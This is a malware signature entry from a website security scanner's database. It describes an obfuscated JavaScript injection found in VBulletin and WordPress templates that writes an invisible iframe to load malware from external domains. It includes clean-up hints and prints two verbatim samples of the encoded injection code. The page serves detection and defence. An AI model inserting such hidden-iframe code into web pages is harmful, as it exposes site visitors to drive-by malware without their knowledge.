SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwiframehd21

malware-entry-mwiframehd21

Description: Javascript encoded code used to hide an iframe from
http://img102.imageshacks.net/img102/4681/head.jpeg and a few different domains.

This is used to load malware from external web sites while not being visible to the user.

Affecting: VBulletin and WordPress sites.

Clean up: This malware is generally hidden inside the template footer or header.

Malware dump (sample of malware):


<script>var _0x38745= ["x77x72x69x74x65"]; var ccBca=document; var aaacB = '<iframJQ21KL#AZ XLMS9Q21rc="http%3A%2F%2Fimg102.imageshacks.net%2Fimg102%2F4681%2Fhead.jpeg" width="1" hJQ21KL#AZight="0" framJQ21KL#AZbordJQ21KL#AZr="0"></iframJQ21KL#AZ>'; var acBaa = aaacB.replace(/XLMS9Q21/g,"s"); var acBac = acBaa.replace(/LSM21ghk8/g,"o"); var BaaBa = acBac.replace(/JQ21KL#AZ/g,"e");ccBca_0x38745[0];</script>


<script>var _0x110261= ["x77x72x69x74x65"]; var aBBcB=document; var ccccc = '<iframJQ21KL#AZ XLMS9Q21rc="http%3A%2F%2Fimg121.imagehacks.info%2Fimg121%2F103%2Fheader.jpeg" width="1" hJQ21KL#AZight="0" framJQ21KL#AZbordJQ21KL#AZr="0"></iframJQ21KL#AZ>'; var BBBcB = ccccc.replace(/XLMS9Q21/g,"s"); var ccBBB = BBBcB.replace(/LSM21ghk8/g,"o"); var cBcBc = ccBBB.replace(/JQ21KL#AZ/g,"e");aBBcB_0x110261[0];</script>